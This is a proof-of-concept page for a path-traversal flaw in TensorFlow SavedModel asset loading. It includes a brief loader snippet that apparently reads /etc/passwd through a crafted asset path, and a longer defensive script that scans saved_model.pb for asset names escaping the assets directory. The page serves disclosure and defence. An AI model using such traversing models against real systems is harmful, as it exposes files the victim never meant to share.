TF-Keras

TensorFlow SavedModel Path Traversal PoC

Proof-of-concept for path traversal via AssetFileDef.filename in TensorFlow's SavedModel loading.

Vulnerability: tensorflow/python/trackable/asset.py - unsanitized ../ in asset filenames.

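```python
import tensorflow as tf

# Load the SavedModel from the current directory.
model = tf.saved_model.load("./")
# Call the model's exported function, which reads the file behind its asset path.
result = model.read_asset()
print(result.numpy().decode())  # Reads /etc/passwd
```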
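A pre-load check for this issue, added here as an example (it is not part of the PoC or of TensorFlow): it pulls every `AssetFileDef.filename` out of `saved_model.pb` with a small standard-library protobuf walker, so the untrusted model is never loaded, and flags names that would resolve outside `<export_dir>/assets`. The function names are hypothetical, the field numbers (`meta_graphs` = 2, `asset_file_def` = 6, `filename` = 2) are taken from TensorFlow's `.proto` definitions, and `SAMPLE` is constructed.

```python
import posixpath

def _varint(buf, i):
    """Decode one protobuf varint starting at buf[i]; return (value, next_index)."""
    value = shift = 0
    while True:
        byte = buf[i]
        value |= (byte & 0x7F) << shift
        i, shift = i + 1, shift + 7
        if not byte & 0x80:
            return value, i

def _fields(buf):
    """Yield (field_number, payload) for each length-delimited field in buf."""
    i = 0
    while i < len(buf):
        key, i = _varint(buf, i)
        wire = key & 7
        if wire == 0:                      # varint: skip
            _, i = _varint(buf, i)
        elif wire in (1, 5):               # fixed64 / fixed32: skip
            i += 8 if wire == 1 else 4
        elif wire == 2:                    # bytes, string or sub-message
            size, i = _varint(buf, i)
            yield key >> 3, buf[i:i + size]
            i += size
        else:
            raise ValueError(f"unsupported wire type {wire}")

def asset_filenames(saved_model_pb):
    """Collect SavedModel.meta_graphs(2) -> asset_file_def(6) -> filename(2)."""
    return [value.decode("utf-8", "replace")
            for n1, meta_graph in _fields(saved_model_pb) if n1 == 2
            for n2, asset in _fields(meta_graph) if n2 == 6
            for n3, value in _fields(asset) if n3 == 2]

def escapes_assets_dir(filename):
    """True if <export_dir>/assets/<filename> would resolve outside assets/."""
    norm = posixpath.normpath(filename.replace("\\", "/"))
    return posixpath.isabs(norm) or norm.split("/")[0] == ".."

def audit(saved_model_pb):
    return [n for n in asset_filenames(saved_model_pb) if escapes_assets_dir(n)]

# Constructed sample (not from the page): one benign and one traversing asset.
SAMPLE = (b"\x08\x01"                      # saved_model_schema_version = 1
          b"\x12\x22"                      # meta_graphs[0], 34 bytes
          b"\x32\x0b\x12\x09vocab.txt"     # asset_file_def { filename }
          b"\x32\x13\x12\x11../../outside.txt")
```

Run `audit(open("saved_model.pb", "rb").read())` before calling `tf.saved_model.load` and refuse to load if the list is non-empty; a truncated or malformed file raises `IndexError` or `ValueError`, which should also be treated as a rejection.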